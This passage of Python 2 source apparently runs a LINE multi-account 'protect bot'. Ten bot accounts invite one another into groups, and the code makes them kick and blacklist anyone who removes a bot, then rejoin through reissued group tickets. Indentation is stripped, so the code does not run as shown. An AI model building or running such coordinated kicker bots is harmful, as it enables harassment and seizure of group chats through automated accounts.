if op.param3 in Amid:
if op.param2 in Emid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Fmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Gmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Hmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Imid:
ki.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Bmid:
if op.param2 in mid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Amid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Cmid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Dmid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Emid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Fmid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Gmid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Hmid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Imid:
kk.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Cmid:
if op.param2 in mid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Amid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Bmid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Dmid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Emid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Fmid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Gmid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Hmid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Imid:
kc.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Dmid:
if op.param2 in mid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Amid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Bmid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Cmid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Emid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Fmid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Gmid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Hmid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Imid:
ks.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Emid:
if op.param2 in mid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Amid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Bmid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Cmid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Dmid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Fmid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Gmid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Hmid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Imid:
k1.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Fmid:
if op.param2 in mid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Amid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Bmid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Cmid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Dmid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Emid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Gmid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Hmid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Imid:
k2.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Gmid:
if op.param2 in mid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Amid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Bmid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Cmid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Dmid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Emid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Fmid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Hmid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Imid:
k3.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Hmid:
if op.param2 in mid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Amid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Bmid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Cmid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Dmid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Emid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Fmid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Gmid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Imid:
k4.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Imid:
if op.param2 in mid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Amid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Bmid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Cmid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Dmid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Emid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Fmid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Gmid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Hmid:
k5.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.type == 13:
if mid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or admin:
cl.acceptGroupInvitation(op.param1)
else:
cl.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Amid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or admin:
ki.acceptGroupInvitation(op.param1)
else:
ki.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Bmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or admin:
kk.acceptGroupInvitation(op.param1)
else:
kk.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Cmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or admin:
kc.acceptGroupInvitation(op.param1)
else:
kc.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Dmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or admin:
ks.acceptGroupInvitation(op.param1)
else:
ks.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
#------------------NOTIFIED_KICKOUT_FROM_GROUP-----------------
if op.type == 19:
if wait["AutoKick"] == True:
try:
if op.param3 in Bots:
pass
if op.param2 in Bots:
pass
else:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
if op.param2 in wait["blacklist"]:
pass
else:
kk.inviteIntoGroup(op.param1,[op.param3])
except:
try:
if op.param2 not in Bots:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
if op.param2 in wait["blacklist"]:
pass
else:
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
else:
pass
#-----------------------------------------------------------------
if mid in op.param3:
if op.param2 in Bots:
pass
try:
ki.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ti = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
k3.acceptGroupInvitationByTicket(op.param1,Ti)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Amid in op.param3:
if op.param2 in Bots:
pass
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
X = kk.getGroup(op.param1)
X.preventJoinByTicket = False
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
k3.acceptGroupInvitationByTicket(op.param1,Ti)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki.getGroup(op.param1)
G.preventJoinByTicket = True
ki.updateGroup(G)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Bmid in op.param3:
if op.param2 in Bots:
pass
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
X = kc.getGroup(op.param1)
X.preventJoinByTicket = False
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
k3.acceptGroupInvitationByTicket(op.param1,Ti)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
G = kk.getGroup(op.param1)
G.preventJoinByTicket = True
kk.updateGroup(G)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Cmid in op.param3:
if op.param2 in Bots:
pass
try:
ks.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = ks.getGroup(op.param1)
G.preventJoinByTicket = False
ks.updateGroup(G)
Ti = ks.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
k3.acceptGroupInvitationByTicket(op.param1,Ti)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
X = kc.getGroup(op.param1)
X.preventJoinByTicket = True
kc.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Dmid in op.param3:
if op.param2 in Bots:
pass
try:
k1.kickoutFromGroup(op.param1,[op.param2])
ks.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k1.getGroup(op.param1)
G.preventJoinByTicket = False
k1.updateGroup(G)
Ti = k1.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
k3.acceptGroupInvitationByTicket(op.param1,Ti)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
X = ks.getGroup(op.param1)
X.preventJoinByTicket = True
ks.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Emid in op.param3:
if op.param2 in Bots:
pass
try:
k2.kickoutFromGroup(op.param1,[op.param2])
k1.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k2.getGroup(op.param1)
G.preventJoinByTicket = False
k2.updateGroup(G)
Ti = k2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
k3.acceptGroupInvitationByTicket(op.param1,Ti)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
X = k1.getGroup(op.param1)
X.preventJoinByTicket = True
k1.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Fmid in op.param3:
if op.param2 in Bots:
pass
try:
k3.kickoutFromGroup(op.param1,[op.param2])
k2.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k3.getGroup(op.param1)
G.preventJoinByTicket = False
k3.updateGroup(G)
Ti = k3.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
k3.acceptGroupInvitationByTicket(op.param1,Ti)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
X = k2.getGroup(op.param1)
X.preventJoinByTicket = True
k2.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Gmid in op.param3:
if op.param2 in Bots:
pass
try:
k4.kickoutFromGroup(op.param1,[op.param2])
k3.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k4.getGroup(op.param1)
G.preventJoinByTicket = False
k4.updateGroup(G)
Ti = k4.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
k3.acceptGroupInvitationByTicket(op.param1,Ti)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
X = k3.getGroup(op.param1)
X.preventJoinByTicket = True
k3.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Hmid in op.param3:
if op.param2 in Bots:
pass
try:
k5.kickoutFromGroup(op.param1,[op.param2])
k4.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k5.getGroup(op.param1)
G.preventJoinByTicket = False
k5.updateGroup(G)
Ti = k5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
k3.acceptGroupInvitationByTicket(op.param1,Ti)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
X = k4.getGroup(op.param1)
X.preventJoinByTicket = True
k4.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Imid in op.param3:
if op.param2 in Bots:
pass
try:
cl.kickoutFromGroup(op.param1,[op.param2])
k5.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
X = cl.getGroup(op.param1)
X.preventJoinByTicket = False
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
k3.acceptGroupInvitationByTicket(op.param1,Ti)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
G = k5.getGroup(op.param1)
G.preventJoinByTicket = True
k5.updateGroup(G)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
#--------------------------------------------------------
if op.type == 19:
if admin in op.param3: #Admin ke Kick
if op.param2 in Bots:
pass
if op.param3 in Bots:
pass
else:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
if mid in op.param3:
if op.param2 in Bots:
pass
try:
random.choice(DEF).kickoutFromGroup(op.param1,[op.param2])
random.choice(DEF).kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(DEF).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = random.choice(DEF).getGroup(op.param1)
G.preventJoinByTicket = False
random.choice(DEF).updateGroup(G)
Ti = random.choice(DEF).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
X = random.choice(DEF).getGroup(op.param1)
X.preventJoinByTicket = True
random.choice(DEF).updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
#--------------------------------
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 25:
msg = op.message
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata("line://home/post?userMid="+mid+"&postId="+"new_post")
cl.like(url[25:58], url[66:], likeType=1001)
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"already")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"decided not to comment")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"deleted")
ki.sendText(msg.to,"deleted")
kk.sendText(msg.to,"deleted")
kc.sendText(msg.to,"deleted")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"It is not in the black list")
ki.sendText(msg.to,"It is not in the black list")
kk.sendText(msg.to,"It is not in the black list")
kc.sendText(msg.to,"It is not in the black list")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"already")
ki.sendText(msg.to,"already")
kk.sendText(msg.to,"already")
kc.sendText(msg.to,"already")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"aded")
ki.sendText(msg.to,"aded")
kk.sendText(msg.to,"aded")
kc.sendText(msg.to,"aded")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"deleted")
ki.sendText(msg.to,"deleted")
kk.sendText(msg.to,"deleted")
kc.sendText(msg.to,"deleted")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"It is not in the black list")
ki.sendText(msg.to,"It is not in the black list")
kk.sendText(msg.to,"It is not in the black list")
kc.sendText(msg.to,"It is not in the black list")
elif wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text in ["help","Help"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,helpMessage)
else:
cl.sendText(msg.to,helpt)
elif msg.text in ["Key","key"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,Keyowner)
else:
cl.sendText(msg.to,helpt)
elif msg.text in ["Mimin","Min"]:
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,Setgroup)
else:
cl.sendText(msg.to,Sett)
elif ("Gn " in msg.text):
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Gn ","")
cl.updateGroup(X)
else:
cl.sendText(msg.to,"It can't be used besides the group.")
elif "Kick " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Kick ","")
random.choice(KAC).kickoutFromGroup(msg.to,[midd])
#===========================================
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["winvite"] == True:
if msg.from_ in admin:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
cl.sendText(msg.to,"-> " + _name + " was here")
break
elif invite in wait["blacklist"]:
ki.sendText(msg.to,"Sorry, " + _name + " On Blacklist")
ki.sendText(msg.to,"Call my owner to use command !, \n➡Unban: " + invite)
break
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
cl.inviteIntoGroup(msg.to,[target])
cl.sendText(msg.to,"Done Invite : \n➡" + _name)
wait["winvite"] = False
break
except:
try:
ki.findAndAddContactsByMid(invite)
ki.inviteIntoGroup(op.param1,[invite])
wait["winvite"] = False
except:
cl.sendText(msg.to,"Negative, Error detected")
wait["winvite"] = False
break
elif "Invite " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Invite ","")
cl.findAndAddContactsByMid(midd)
cl.inviteIntoGroup(msg.to,[midd])
#--------------- SC Add Admin ---------
elif "Admin add @" in msg.text:
if msg.from_ in admin:
print "[Command]Staff add executing"
_name = msg.text.replace("Admin add @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
gs = k4.getGroup(msg.to)
gs = k5.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Contact not found")
